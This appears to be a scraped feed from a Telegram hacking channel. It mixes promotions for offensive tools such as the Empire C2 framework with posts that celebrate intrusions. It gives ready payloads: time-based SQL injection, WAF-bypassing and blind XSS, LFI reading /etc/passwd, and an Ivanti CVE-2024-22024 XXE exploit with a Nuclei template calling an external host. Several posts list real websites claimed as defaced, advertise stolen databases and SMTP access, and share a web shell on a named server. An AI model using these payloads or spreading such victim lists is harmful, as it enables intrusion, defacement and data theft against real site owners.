🐱 SiCat 🐱

The useful exploit finder

💬
SiCat is an advanced exploit search tool designed to identify and gather information about exploits from both open sources and local repositories effectively. With a focus on cybersecurity, SiCat allows users to quickly search online, finding potential vulnerabilities and relevant exploits for ongoing projects or systems.

SiCat's main strength lies in its ability to traverse both online and local resources to collect information about relevant exploitations. This tool aids cybersecurity professionals and researchers in understanding potential security risks, providing valuable insights to enhance system security.

🔼 Installation:

pip  install  -r  requirements.txt

💻 Usage:

python sicat.py --help

📂 Example:
From keyword:

python sicat -k telerik --exploitdb --msfmodule

From nmap output:

nmap -sV localhost -oX nmap_out | python sicat -nm --packetstorm

😸 Github

⬇️ Download
🔒 BugCod3

#Exploit #Metasploit #Finder
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

🔥New Triaged report Sql Injection 😍 > Payload used time-based poc.

,%27%29%20AND%20%28SELECT%209683%20FROM%20%28SELECT%28SLEEP%285%29%29%29FKuq%29--%20wXyW

MySQL

#bugbountytip #infosec
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

🕸 Site:
http://kk-qq.work/index.html
https://comls.co.jp/BugCod3.html
http://comls.jp/BugCod3.html
http://hagakure.pro/index.html
http://tanpopo12.work/index.html
http://lanciaconstructora.com/

👁‍🗨 Mirror-h

Country: 🇯🇵🇺🇸

#Deface
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

Free Shell

🔗 Link

#Shell
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

🕸 Site:
https://apsgevents.com/
https://giftimprint.com/
http://kulibangunan.giftimprint.com/
https://mail.giftimprint.com/
https://redstarfilms.net/
https://mail.redstarfilms.net/
https://tropicanarestaurants.com/
https://mail.tropicanarestaurants.com/

👁‍🗨 Mirror-h

📊 Database

🛡 Smtp

📧 LeafMailer

🔒 bugcod3

Country: 🇺🇸

#Deface
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

Bypass Cloudflare WAF (XSS without parentheses) inside an anchor tag

javanoscript:var{a:onerror}={a:alert};throw%20document.domain

#bugbountytips #bugbounty
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

Command Injection Payload List

⬇️ Download

#Payload #Command #Injection
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

☠️ xnLinkFinder v4.4 ☠️

💬
A python tool used to discover endpoints, potential parameters, and a target specific wordlist for a given target

📊 This is a tool used to discover endpoints (and potential parameters) for a given target. It can find them by:
⚪️ crawling a target (pass a domain/URL)
⚪️ crawling multiple targets (pass a file of domains/URLs)
⚪️ searching files in a given directory (pass a directory name)
⚪️ get them from a Burp project (pass location of a Burp XML file)
⚪️ get them from an OWASP ZAP project (pass location of a ZAP ASCII message file)
⚪️ get them from a Caido project (pass location of a Caido export CSV file)
⚪️ processing a waymore results directory (searching archived response files from waymore -mode R and also requesting URLs from waymore.txt and the original URLs from index.txt - see waymore README.md)

🔼 Installation:

cd xnLinkFinder
sudo python setup.py install

💻 Usage:

python xnLinkFinder.py --help

📂 Examples:

#specific target
python3 xnLinkFinder.py -i target.com -sf target.com

#list of URLs
python3 xnLinkFinder.py -i target_js.txt -sf target.com

😸 Github

⬇️ Donwload
🔒 BugCod3

#Python #Discover #Endpoints
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

NetProbe: Network Probe

💬
NetProbe is a tool you can use to scan for devices on your network. The program sends ARP requests to any IP address on your network and lists the IP addresses, MAC addresses, manufacturers, and device models of the responding devices.

📊 Features:
⚪️ Scan for devices on a specified IP address or subnet
⚪️ Display the IP address, MAC address, manufacturer, and device model of discovered devices
⚪️ Live tracking of devices (optional)
⚪️ Save scan results to a file (optional)
⚪️ Filter by manufacturer (e.g., 'Apple') (optional)
⚪️ Filter by IP range (e.g., '192.168.1.0/24') (optional)
⚪️ Scan rate in seconds (default: 5) (optional)

🔼 Installation:

cd NetProbe
pip install -r requirements.txt

💻 Usage:

python3 netprobe.py —help

📂 Example:

python3 netprobe.py -t 192.168.1.0/24 -i eth0 -o results.txt -l

😸 Github

⬇️ Download
🔒 BugCod3

#Python #Network #Scanner #Vulnerability #Tools
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

🕸 Site:
https://ipebs.in/
https://govacancia.com/
http://rivieravoyages.com/
http://mail.rivieravoyages.com/
https://stavolink.com/
https://tridentresortsholidays.com/
https://deparagon.com/
http://woosquare.deparagon.com/index1707261924.html
http://ebaymasterkey.deparagon.com/
http://masterkey.deparagon.com/
http://multi.deparagon.com/
http://search.deparagon.com/
http://smspress.deparagon.com/

👁‍🗨 Mirror-h

📊 Database (tridentresortsholidays.com)

Country: 🇺🇸🇮🇹

#Deface
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

PHP: 8.1.27

Safe Mode: OFF

ServerIP: 213.158.95.90 [🇮🇹]

HDD: Total:1536.00 GB
Free:1322.97 GB [86%]

useful:--------------

Downloader: --------------

Disable Functions: All Functions Accessible

CURL : ON | SSH2 : OFF | Magic Quotes : OFF | MySQL : ON | MSSQL : OFF | PostgreSQL : ON | Oracle : OFF | CGI : OFF

Open_basedir : NONE | Safe_mode_exec_dir : NONE | Safe_mode_include_dir : NONE

SoftWare: nginx/1.22.0

🔗 Link

Enjoy... ⭐️

#Shell
➖➖➖➖➖➖➖➖➖➖
🔥 0Day.Today
📣 T.me/BugCod3
📣 T.me/LearnExploit

I found a url like this :
https://domain.io/redirect?url=some_base_64_encoded_string

encoded javanoscript:alert("Xss by vikas") to base64 like :
amF2YXNjcmlwdDphbGVydCgiWHNzIGJ5IHZpa2FzIik=

Now the new url is like this :
https://domain.io/redirect?`url=amF2YXNjcmlwdDphbGVydCgiWHNzIGJ5IHZpa2FzIik=`

📘 Twitter

#bugbounty #xss #infosec
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

ALWAYS test 404 Not Found in Bug Bounties!

🔗 Medium
🔗 Freedium

#Writeup
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

👋 LFI Payload 👋

Payload:
".%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd"

#bugbountytips #bugbounty #CyberSecurity
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

CVE-2024-22024

XXE on Ivanti Connect Secure

☠️ payload encoded base64:
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % xxe SYSTEM "http://{{external-host}}/x"> %xxe;]><r></r>

send it to:
127.0.0.1/dana-na/auth/saml-sso.cgi with SAMLRequest parm

#bugbountytips #cve #Ivanti
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

JSON Smuggling: A far-fetched intrusion detection evasion technique

🔗 Medium

#infosec #cybersecurity #blueteam
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

Nuclei PoC for Ivanti XXE (CVE-2024-22024)

id: CVE-2024-22024

info:
  name: Ivanti Connect Secure - XXE
  author: watchTowr
  severity: high
  denoscription: |
    Ivanti Connect Secure is vulnerable to XXE (XML External Entity) injection.
  impact: |
    Successful exploitation of this vulnerability could lead to unauthorized access to sensitive information or remote code execution.
  remediation: |
    Apply the latest security patches or updates provided by Ivanti to fix the XXE vulnerability.
  reference:
    - https://labs.watchtowr.com/are-we-now-part-of-ivanti/
    - https://twitter.com/h4x0r_dz/status/1755849867149103106/photo/1
  metadata:
    max-request: 1
    vendor: ivanti
    product: "connect_secure"
    shodan-query: "html:\"welcome.cgi?p=logo\""
  tags: cve,cve2024,kev,xxe,ivanti

variables:
  payload: '<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM
    "http://{{interactsh-url}}/x"> %watchTowr;]><r></r>'

http:
  - raw:
      - |
        POST /dana-na/auth/saml-sso.cgi HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        SAMLRequest={{base64(payload)}}

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol  # Confirms the DNS Interaction
        words:
          - "dns"

      - type: word
        part: body
        words:
          - '/dana-na/'
          - 'WriteCSS'
        condition: and
# digest: 490a0046304402206a39800bff0d9ca85a05e3686a0e246f8d5504a38e8501a1d7e8684ae6f2853002205ba7c74bb1f99cacf693e8a5a1cd429dcd7e52fab188beb8c95b934e4aabcd57:922c64590222798bb761d5b6d8e72950

#Nuclei #Templates #PoC #XXE
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

🥩 PDF

#Wordlist #PDF
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

🕸 Site:
https://www.sergiocardozo.paineladvocacia.com/
http://acesso.paineladvocacia.com/
https://maioranoadvocacia.com/
http://smart.wecaninfotech.com/
https://tropicanarestaurants.com/index.php
https://madein.az/index.html

👁‍🗨 Mirror-h

Country: 🇺🇸🇹🇭

#Deface
➖➖➖➖➖➖➖➖➖➖
📣 T.me/BugCod3
📣 T.me/LearnExploit

👑 Empire 👑

💬
Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers. The Empire server is written in Python 3 and is modular to allow operator flexibility. Empire comes built-in with a client that can be used remotely to access the server. There is also a GUI available for remotely accessing the Empire server, Starkiller.

📊 Features:
⚪️ Server/Client Architecture for Multiplayer Support
⚪️ Supports GUI & CLI Clients
⚪️ Fully encrypted communications
⚪️ HTTP/S, Malleable HTTP, OneDrive, Dropbox, and PHP Listeners
⚪️ Massive library (400+) of supported tools in PowerShell, C#, & Python
⚪️ Donut Integration for shellcode generation
⚪️ Modular plugin interface for custom server features
⚪️ Flexible module interface for adding new tools
⚪️ Integrated obfuscation using ConfuserEx 2 & Invoke-Obfuscation
⚪️ In-memory .NET assembly execution
⚪️ Customizable Bypasses
⚪️ JA3/S and JARM Evasion
⚪️ MITRE ATT&CK Integration
⚪️ Integrated Roslyn compiler (Thanks to Covenant)
⚪️ Docker, Kali, ParrotOS, Ubuntu 20.04/22.04, and Debian 10/11/12 Install Support

🔼 Install:

cd Empire
./setup/checkout-latest-tag.sh
./setup/install.sh

😸 Github

#Hacktoberfest #C2 #Redteam #Infrastructure
➖➖➖➖➖➖➖➖➖➖
📣 T.me/BugCod3
📣 T.me/LearnExploit

Adding 2 new blind XSS payloads to the XSS scanner payload vault 😎

'"><Svg Src=//{CANARY_TOKEN}/s OnLoad=import(this.getAttribute('src')+0)>

AND

'"><Img Src=//{CANARY_TOKEN}/x Onload=import(src+0)>

#XSS #Bugbounty #Tip
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3